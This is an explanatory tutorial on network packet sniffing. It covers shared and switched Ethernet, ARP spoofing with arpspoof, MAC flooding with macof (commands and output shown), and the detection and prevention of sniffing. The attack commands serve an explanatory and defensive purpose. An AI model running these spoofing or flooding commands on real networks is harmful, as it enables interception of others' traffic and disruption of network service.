A sniffer is a program or a device that eavesdrops on the network traffic by grabbing information traveling over a network. Sniffers basically are “Data Interception” technology.
In packet-switched networks, the data to be transmitted is broken down into several packets. These packets are reassembled once all the data packets reach their intended destination.
When a packet sniffer is installed in the network, the sniffer intercepts the network traffic and captures the raw data packets. Subsequently, the captured data packet is analyzed by the packet sniffing software and presented to the network manager/technician in a user-friendly format. By user-friendly, we mean the Network Administrator should be able to make sense of it.
There are 2 basic types of Ethernet environment and how sniffers work in both these cases is slightly different.
- Shared Ethernet: In a shared Ethernet environment all hosts are connected to the same bus compete with one another for bandwidth. In such an environment packets meant for one machine are received by all the other machines.
- Switched Ethernet: An ethernet environment in which the hosts are connected to switch instead of a hub is called a switched Ethernet. The switch maintains a table keeping track of each computer’s MAC address and the physical port on the switch to which that MAC address is connected and delivers packets destined for a particular machine correspondingly. The switch is an intelligent device that sends packets to the destined computer only and does not broadcast it to all the machines on the network, as in the previous case. This results in better utilization of the available bandwidth and improved security.
Though a switch is more secure than hub, the following methods can still be used to sniff on a switch:
1. ARP Spoofing
Using arpspoof to poison the ARP cache of a machine is accomplished by giving the command:
root@mint:~# arpspoof -t 192.168.0.131 192.168.0.136
dc:53:60:2b:e7:47 94:65:9c:20:9c:7a 0806 42: arp reply 192.168.0.136 is-at dc:53:60:2b:e7:47
dc:53:60:2b:e7:47 94:65:9c:20:9c:7a 0806 42: arp reply 192.168.0.136 is-at dc:53:60:2b:e7:47
2. MAC Flooding:
root@mint:~# macof
4e:f3:64:3d:17:17 11:92:23:7d:6a:51 0.0.0.0.389 > 0.0.0.0.60438: S 1713527361:1713527361(0) win 512
66:3e:8:6b:fd:38 d6:1c:b3:75:8a:45 0.0.0.0.50476 > 0.0.0.0.52504: S 94222295:94222295(0) win 512
Warning: This method might lead to degeneration of the network service and should not be run for a long interval of time.
Detecting Sniffers:
A sniffer is usually passive, it just collects data. Hence it becomes extremely difficult to detect sniffers, especially when running on a shared Ethernet. But it is slightly easier when the sniffer is functioning on a Switched Ethernet network segment. When installed on a computer, a sniffer does generate some small amount of traffic.
- Ping Method.
- ARP Method.
- On Local Host.
- Latency Method.
- ARP Watch.
- Using IDS.
Preventing Sniffing:
The best way to secure our self against sniffing is to use encryption. While this won’t prevent a sniffer from functioning it will ensure that what a sniffer reads are pure junk
If we are on a switched network, the chance is that arp spoofing will be used for sniffing purpose. The machine that the malicious user will most probably try to arp-spoof is the gateway. To prevent this from happening, we can add the MAC address of the gateway permanently to our ARP cache. This can be done by placing the MAC address of your gateway and other important machines in the /etc/ethers file.
Switch to SSH. SSH is fast becoming the de facto standard method of connecting to a Unix/Linux machine. For more information on SSH, check out http://www.ssh.fi. We might want to check out the open-source implementation OpenSSH at http://www.openssh.org/
Instead of using HTTPS if the site supports it. In Case we are really bothered about the privacy of our mail.
Programs to detect sniffers:
- Anti sniff.
- Neped.
- ARP Watch.
- Snort.